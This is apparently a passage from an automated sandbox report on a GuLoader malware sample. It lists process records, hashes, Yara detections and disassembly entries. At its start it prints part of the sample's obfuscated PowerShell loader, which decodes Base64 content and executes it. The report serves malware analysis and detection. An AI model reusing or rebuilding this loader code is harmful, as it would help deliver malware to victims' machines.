vo.istasammdSpaeFGeigiArv l L.meKree( pla$ UstGHol a olylU.lavLydbaNonpnCut.iOve,sFakumPre ,Hypa$UnviH PakjUn ge.iddmAm dlSankn ilgBebysbgerlKgebe.uitr Renn Prie Pro1Kopv1ov r5Bass) int ';$Hjemlngslerne115=$Balsameringerne;Profitmagere (Tollhouse 'Elbe$TilbgForrL TekoAdonbAnimASy dLCram:Afs AB zanRa dtAmbaaStatRKannCfle,hVe.diFiliSInittF ysiHorscSchaANosolOedi=Bala(StyrtHaaneunthSU coT hor-DistPtet,AK beTEksaHRdse xtr$Sebih BorJUnd ENeohMMutil GnaN AfggAtl S La LYahoE HverNeogNco lEHooc1Inte1Sukk5gi b)Dise ');while (!$Antarchistical) {Profitmagere (Tollhouse 'Game$Regeg .onlAfgioS,bhbThyraFortlL ot: nclPRipsrHi liSmrem ropuGeotsEmaneVintrDeut=Fejl$MindtTr erCrumuOkkuefrav ') ;Profitmagere $Strygejernene;Profitmagere (Tollhouse ' 
FlaSRheutDvnlAHarpRGlagt cli-Cal.S Aa lRigsES vee .auP Pr Subs4 Dam ');Profitmagere (Tollhouse 'gyps$Ku eGGastLSkamOstarb nsaS adl Ver:RammARektNSkalTSucuaApperTwatC omaHKoloi disSDesitSuffITranc ,ndAFredlgrun=R nk(AngiT.izzEtykkSFr mtNaiv- Endp O.eADuppTDok,H.dtr fr.m$Finsh Prej metEWo dm ladLUra nDupogJumbsBrnel ,leEPurvrUnfunTrekeMara1Colo1Cont5Succ)Fred ') ;Profitmagere (Tollhouse 'Ung,$Si,kGRubrL StaoCin B D.cA TefLCom.:E diF ifoHnger OkkN Gery ropeSt pR.omm=d ad$FollgTuneLGat.O X lbPod.aMyrilInco: ratFGrowecommSStritBipls Tida AninOmregpasse ploNMesaE MarsUnen1S,ed9 For1Isoa+Turb+Lain%Teff$OverHFurcoKroprSkr,MF ioO Injn Un eChem.inteCSerio EksUFejlNHysttPush ') ;$Galvanism=$Hormone[$Fornyer];}$Grooverhead=297577;$Quadricycler=30628;Profitmagere (Tollhouse 'Gade$LangGDrosL PlaOTrolbOverABraiL ark:SkrmTR grR Kl iA oycB,edlNud,iVo tN piuI.uenuFlytM Ge inva=Inh. sejtg FraEStriTSko,- AdeC winoBindNCrantS.avEcellN .rst hav Anad$rec,hSk kJ IndeLo,wMAkvalTo dNhom,GTongSDi oL JuvETho.rUncanMondESace1Dagt1Am.e5Gunv ');Profitmagere (Tollhouse 'Saks$OvilgSa ilHeatoRevobCamea AlflRe l:UdkrTS agr AngaDilig ,ruiHolok Cole epr ScyeCa.v Popu= atc ava[PraeSMicryBor,steactfol.eS.anmDat . GenC Eleo rmmnApolvPle eLandrParat Kom]Jule: Bo :PlioF Ther DocoT,anm DukB Bija La,sG nteE ta6 Hol4plafSbesnt Halr iliMetan,aflgU.ps( Cra$UdflTselvrBug,ijag,cfremlProfiKodinHeraiDe.iuFluemPedi)Mu a ');Profitmagere (Tollhouse 'stru$BaleGMel.LAv lOSnedBRecrASla lC al:Ch ipvendEGys R ForV.efjAUn,esRoseI MarOC.unNHai Zoog= ot ka.a[.ppeSUntiygrinsIndeT,erveTe tMPris.Pe lThal.E.yndX ,anTSfa . .areDobbNUnceCdolpO PreDelimI VernSymbg er]Mun : Sin:SognA nivsHalacSpeei VeliSkat.DoveGRetfeParatUndeSTilsT ontR frsIShunNTa dGFlou(Thyr$Atebt TolrBogea Tipg B oi nhykCardEKrigrUretE Ma )I tr ');Profitmagere (Tollhouse 'Slge$ E,iG AftlTek.OFroeB lesARa,ilBank:RewiNM.rieRomiWBanaFTranoEddeUUd mnBlacDTal l BraN uppDP.tuENagerTyraSPre =Svel$ DepPBeareedulrKlapV.ruma UnmS HylITilhO SkanPro.. 
nrlSAnagu oncb Ps S S rtInfiRDes.IAgn.nMil.g Hyp(Shou$ SvrGR.soR D aOkreoOHengv Pere imer IsohI dhEOctoA GrndMast,Back$Und.QShelUGa,tAPileDPyaeR MadiAntec SteyKongCC ckLChareDentR Ud ).lai ');Profitmagere $Newfoundlnders;"
                                    Imagebase:0xee0000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2673637961.0000000008380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2659683449.000000000569C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2673783211.00000000097DB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    Target ID:7
                                    Start time:09:07:16
                                    Start date:24/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff68cce0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                      • API ID:
                                      • String ID: $_q$$_q$$_q
                                      • API String ID: 0-2441406858
                                      • Opcode ID: abcaa3fa788a0bfb74ae90abbd1bb298d96d05d9828af800514e16724b1a09c1
                                      • Instruction ID: 1f675aba310214e68e7f963c9fb572b9f1ec9f396e6f4d34b9446735635b49e3
                                      • Opcode Fuzzy Hash: abcaa3fa788a0bfb74ae90abbd1bb298d96d05d9828af800514e16724b1a09c1
                                      • Instruction Fuzzy Hash: C64158B6B002179BCF685E69890066FFBE9AFC4314F24863AD815EB344DB31D941D7E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $_q$$_q$$_q
                                      • API String ID: 0-2441406858
                                      • Opcode ID: 6437d5c66f9ac56a9c4f326d9478012271372024485679be737a0bfc988f1128
                                      • Instruction ID: 38527eb63014f4edcb8b7c38223f318ff2e348cf9e7c92b0e6898384f3cc6b74
                                      • Opcode Fuzzy Hash: 6437d5c66f9ac56a9c4f326d9478012271372024485679be737a0bfc988f1128
                                      • Instruction Fuzzy Hash: DF216EB130034B67DFB4566D8850727B6DA5FC0711F30853AE915C7281ED76C541D351
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (f0l$4'_q
                                      • API String ID: 0-1926906172
                                      • Opcode ID: 26c802c4f9de2feb7ad6d6ab146bb98805102f6dcc5f4d780705c6e7aab9b33b
                                      • Instruction ID: ca9095c391cfe6c8706b9bea2affe3e940431805961c93244c6f94b0a0ecb30e
                                      • Opcode Fuzzy Hash: 26c802c4f9de2feb7ad6d6ab146bb98805102f6dcc5f4d780705c6e7aab9b33b
                                      • Instruction Fuzzy Hash: 7A228FB4B10214DFDB54CB18C881B9AF7B2BB86304F14C2A9D959AB391CB76ED81CF51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $_q$$_q
                                      • API String ID: 0-458585787
                                      • Opcode ID: d7b7161e6303ea8c50cbcdff561a6743c627bf1e2d2f02ead77b073a25857aaa
                                      • Instruction ID: 5702e2f07083a3da5e389e6423a588d7c249e9e97747b9797684a3d6c15d2c06
                                      • Opcode Fuzzy Hash: d7b7161e6303ea8c50cbcdff561a6743c627bf1e2d2f02ead77b073a25857aaa
                                      • Instruction Fuzzy Hash: 0C2106B69053579FCF159F7988406AABFF4AF46210B2A42B7DC58D7242D3309900D7F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $_q$$_q
                                      • API String ID: 0-458585787
                                      • Opcode ID: ea709fc59dcb07e7c2a9a7832b28fb5786e1cbb67d1e66891de040e6347c9dbb
                                      • Instruction ID: 5a4806e8d04fe4dacf16f311334a78264715af816de7141b5ec6d2bd5a4aec71
                                      • Opcode Fuzzy Hash: ea709fc59dcb07e7c2a9a7832b28fb5786e1cbb67d1e66891de040e6347c9dbb
                                      • Instruction Fuzzy Hash: CD2135B13043872BDF75063988507637FEA9F82700F2481B6E944DB692E669C985D361
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q
                                      • API String ID: 0-2033115326
                                      • Opcode ID: 8fb29aa9fad0454afe6cd44ae953afda999a6c070b43363ce72e1aa1e8354309
                                      • Instruction ID: e8cef9bd21e9a900bd89c838add96a5c461fa90b4b627cfbfb520d4d616a69a3
                                      • Opcode Fuzzy Hash: 8fb29aa9fad0454afe6cd44ae953afda999a6c070b43363ce72e1aa1e8354309
                                      • Instruction Fuzzy Hash: 864126F0705206DFDF688F28D590B7E77E29F81220F1486B9D8009B295EB75CD40DB51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: x.!k
                                      • API String ID: 0-3957559734
                                      • Opcode ID: be1a73642e43db0b82ba9a21bf60a11c0a0a055982b26eae0e4bb3f98768d008
                                      • Instruction ID: 98be8ddb3547be32551ce1b7fd24a9904a01c01d069c0315249ff71a374fbd0a
                                      • Opcode Fuzzy Hash: be1a73642e43db0b82ba9a21bf60a11c0a0a055982b26eae0e4bb3f98768d008
                                      • Instruction Fuzzy Hash: 5D3184B4B40218ABD7049764C951BAFBBA3DB94314F20C124E9016F795CFB99C45CBE1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 93a5512cc513ded99c1c19f446106a729e3c53d9a31f61477086ee9b7adf0997
                                      • Instruction ID: 2feba780f4dd4d3048819cfd02b6778be0cd559ab2fb4ae07f55963a2bbdfc7e
                                      • Opcode Fuzzy Hash: 93a5512cc513ded99c1c19f446106a729e3c53d9a31f61477086ee9b7adf0997
                                      • Instruction Fuzzy Hash: ED223874A012099FCB15CFA8C594AAEFBB2FF48314F25C559E815AB365C732ED42CB90
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5264749fb6a2cccfaf66264cf3899cdc6d83e813b49df5575fee0b36b5824295
                                      • Instruction ID: 135d1a187ea6ed82f4fc46043dd2376e86071deedaa44d70c1b4db9e36e60a36
                                      • Opcode Fuzzy Hash: 5264749fb6a2cccfaf66264cf3899cdc6d83e813b49df5575fee0b36b5824295
                                      • Instruction Fuzzy Hash: 1BD1C374A00209AFCB15CFA8D584E9DBBB2FF48314F25D559E805AB365C732ED82CB90
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8bb9aff99af535237ac86699bd7a0fe5afe98549ea48fc87a84c33ab5c029c68
                                      • Instruction ID: e58ca97a0d9441ecfa75698337aea42215cf254cda516a5d66de72c370bc1476
                                      • Opcode Fuzzy Hash: 8bb9aff99af535237ac86699bd7a0fe5afe98549ea48fc87a84c33ab5c029c68
                                      • Instruction Fuzzy Hash: B0C18F31A002488FCB14DFA4DA44E9DBBB6FF85318F19816DE406AB365CB75ED4ACB41
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b846d23e01090864454abdf93223c63233b3805e55f851edd427382bd9663940
                                      • Instruction ID: 1c32d95f0e70a9bf7879b77b37cfb048d17f7c02b4df23db8ef1e3345b0adec2
                                      • Opcode Fuzzy Hash: b846d23e01090864454abdf93223c63233b3805e55f851edd427382bd9663940
                                      • Instruction Fuzzy Hash: 3C818130A002488FCB14DF68D980BADBBF2FF85318F28856DD416AB765DB75AC46CB51
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b7a37599aa00a872acb3fbdb9aa65448192ed8c0489246db96c09383d1f7d6c
                                      • Instruction ID: 1aeed98135b8ef453f2dddec9a66b97b756c9859b2a08bb376f1df5ad53233ca
                                      • Opcode Fuzzy Hash: 8b7a37599aa00a872acb3fbdb9aa65448192ed8c0489246db96c09383d1f7d6c
                                      • Instruction Fuzzy Hash: AC718F30A112449FCB15CFA4D588EAEBBF2FF89314F1584A9E405AB362DB35ED46CB50
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0ee2d63eacacc2252c3b9b87b51b50fbd0bc477db4666b2c341571ff535a66df
                                      • Instruction ID: d6d4b14d99e5be0b7d79cb3e404352c8a81be2ca2e154dab701df313dcd2581a
                                      • Opcode Fuzzy Hash: 0ee2d63eacacc2252c3b9b87b51b50fbd0bc477db4666b2c341571ff535a66df
                                      • Instruction Fuzzy Hash: 3C41E1F5B002029FCF60CE288941A6BFBE2AF92244F1982B5D9149B691D735D940DFA1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d55039635cf36b9caa1c1e1e506c1540bbf7157217741bd3252564554784f1e8
                                      • Instruction ID: 5ac4d7925a212bf960e9a20c018292436d8e5b9e5f86f448f823173a675f70d0
                                      • Opcode Fuzzy Hash: d55039635cf36b9caa1c1e1e506c1540bbf7157217741bd3252564554784f1e8
                                      • Instruction Fuzzy Hash: A9418D346042048FDB14DF24D959BADBBB2FF89718F29906DE806EB3A0DB759C42CB51
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 188a5c1b96ae811653b69be2e33bf417fe2c2c62a0fdf637500de226ec2b270e
                                      • Instruction ID: d15486881a78f717cfda6ab2c4a5122f910c3ccf1d9fd6490eeef890ba752970
                                      • Opcode Fuzzy Hash: 188a5c1b96ae811653b69be2e33bf417fe2c2c62a0fdf637500de226ec2b270e
                                      • Instruction Fuzzy Hash: B6416D70A00208DFDB14DFA5C984B9DBBB2BF85308F18857DD406AB2A5DBB5AC46CB41
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84f7e5687f444ad1ed005ef2af22f9872e417ed1d44f8c528d9afd0d86456afc
                                      • Instruction ID: 39a7197f364392a857f330d6c3d07ff136f35b96ce3f53c3aef31e195aaebdb0
                                      • Opcode Fuzzy Hash: 84f7e5687f444ad1ed005ef2af22f9872e417ed1d44f8c528d9afd0d86456afc
                                      • Instruction Fuzzy Hash: F2214CF130030BABCF645A6E881073BBADA9FC4719F248539E505DB281DE75C981D361
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7a5dae7e7206807e118b86ba8ab60b810069541bd97a6cbc0dbc754d2004292b
                                      • Instruction ID: 2283f30962aa3d13d13c4f447152a63129ba607930e5c62018ef76d08080eb4d
                                      • Opcode Fuzzy Hash: 7a5dae7e7206807e118b86ba8ab60b810069541bd97a6cbc0dbc754d2004292b
                                      • Instruction Fuzzy Hash: 3C312E30A041588FCB26DB64C955BEEB7B2BF89304F1444E9D409AB352DF369E82CF81
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bdfc0533ea925cfd452170c4ed1e9250160f22179c72a4b58051f8c08794c3e
                                      • Instruction ID: 7fdcadfed277457a90f28b68dacfc04a005cedd1607ddb6b4058d1814b20c285
                                      • Opcode Fuzzy Hash: 6bdfc0533ea925cfd452170c4ed1e9250160f22179c72a4b58051f8c08794c3e
                                      • Instruction Fuzzy Hash: 7D316F75A042459FCB01CF59C990DAAFBF1FF49310B1582AAD848EB762C731EC52CBA1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2644420102.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_ec0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6263a6bbb386205019462f9bf7731e8d04e5190dc8fb399dfdc570bc146d65b9
                                      • Instruction ID: f697d1494c343417f46ee4eb5edd518c41767a9bfa252b168f3d584767375841
                                      • Opcode Fuzzy Hash: 6263a6bbb386205019462f9bf7731e8d04e5190dc8fb399dfdc570bc146d65b9
                                      • Instruction Fuzzy Hash: 3D316D74A042459FCB05CF59C990DAABBF1FF4D310B15819AD848EB762C732EC52CBA1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5be5e0f1c9256538a7c23be56ca6891d75d83292cb80f42047807bc3f72b2980
                                      • Instruction ID: 5f3687f0e028f5c133fc772eb9952e532dd55e0e2389ff6eaefb469e03865f4f
                                      • Opcode Fuzzy Hash: 5be5e0f1c9256538a7c23be56ca6891d75d83292cb80f42047807bc3f72b2980
                                      • Instruction Fuzzy Hash: 71218BF530438A7BCF540A7989007767FEA9F82708F18853AE644DB1C3D679C984C361
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d0f83cdb5632cc8b4182ef1563139ab73e12b9530e278989a66daaf037101b4
                                      • Instruction ID: 498d5c0f62e7187edaa295afa6153a7523c7e44259dfe77a2aff2fa928f96da6
                                      • Opcode Fuzzy Hash: 3d0f83cdb5632cc8b4182ef1563139ab73e12b9530e278989a66daaf037101b4
                                      • Instruction Fuzzy Hash: BA0147B730031B9BCFA44A6AD40017AF7DADFC1622F14C53EE958C7210D636C805E360
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2642641691.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_95d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d7c12b729bcce74c51962d9c0bac587c5780334071cd9c036baa92f572352ed
                                      • Instruction ID: 045d0cae7cc2e70ef152bdcd0a36435e81d428ae5e58ba09b4a89a7a9b2e7f9f
                                      • Opcode Fuzzy Hash: 3d7c12b729bcce74c51962d9c0bac587c5780334071cd9c036baa92f572352ed
                                      • Instruction Fuzzy Hash: 1301F7714063409AD730CA36D984B67BF9CDF41322F18C819EC485A286C2789849C7B1
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2642641691.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_95d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1caa38a45daa7e6c029fefea722695ba94e3b25ac36856ec2c874cc27cc112e
                                      • Instruction ID: bb23033b93ae31c4b7b0d9b68d979b54faadacbb83b3abc6cf505fe39971b721
                                      • Opcode Fuzzy Hash: e1caa38a45daa7e6c029fefea722695ba94e3b25ac36856ec2c874cc27cc112e
                                      • Instruction Fuzzy Hash: EC01406140E3C09ED7228B258894B52BFB8EF53225F19C5DBDC888F197C2695849C772
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aef2a68e520a1be5f2d3ad5b8796139176ec5180af460374e25e3204e76deec4
                                      • Instruction ID: 10580de32578f5b5e1d201fb95a415d4c6d1b681d90d30781181f6d3306d0fe6
                                      • Opcode Fuzzy Hash: aef2a68e520a1be5f2d3ad5b8796139176ec5180af460374e25e3204e76deec4
                                      • Instruction Fuzzy Hash: 6FF039752093818FDB668B60C864AA4BB71AF83214F2DC2EBD4808F1A7C737A845D752
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,S0l$,S0l$4'_q$4'_q$4'_q$4'_q$d5 k$tP_q$tP_q$xS0l$$_q
                                      • API String ID: 0-4000509439
                                      • Opcode ID: 1f936e7a93e462540784e89e79a0932432507b81ae2673b10075986364301edf
                                      • Instruction ID: 049b5fafdf067999a11e64e976968bf2cb84c9558b86ff302d38356e406670bd
                                      • Opcode Fuzzy Hash: 1f936e7a93e462540784e89e79a0932432507b81ae2673b10075986364301edf
                                      • Instruction Fuzzy Hash: F5D16CB1704346AFCF658B68881066BFBF2AF86310F1486BAD515CF252DB31C845DBA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$84.l$84.l$d%eq$d%eq$d%eq$d%eq$tP_q$tP_q$$_q
                                      • API String ID: 0-3744611123
                                      • Opcode ID: 4db3c45beb60d36ca53122505fcbf573462d6a27a7f7f5c7d63b4e42b3f22cbc
                                      • Instruction ID: eca99a5376ea1f7b944925d9ae1f1ca19859543285e878925e5908c439b55bb5
                                      • Opcode Fuzzy Hash: 4db3c45beb60d36ca53122505fcbf573462d6a27a7f7f5c7d63b4e42b3f22cbc
                                      • Instruction Fuzzy Hash: 377135B1B90206DFCF149F28D45067AFBE2AB85300F248679E8159B295DB35DC41DB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2667663580.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7090000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'_q$4'_q$tP_q$tP_q$$_q$$_q$$_q$$_q$&l$&l
                                      • API String ID: 0-3277706841
                                      • Opcode ID: febc3dae9979bfe2d4f105be706111945e66999f91e19333b13de3193ef5dd7d
                                      • Instruction ID: 86bbbdb3630e70d4eb49cb8b11f01d68e3aa82e23cc03aaafa7f2d74bc93bdd7
                                      • Opcode Fuzzy Hash: febc3dae9979bfe2d4f105be706111945e66999f91e19333b13de3193ef5dd7d
                                      • Instruction Fuzzy Hash: 72B189B27083469FCB154B798C0076AFFE2AF86210F15C6BBE455CB292DA31DC45CBA1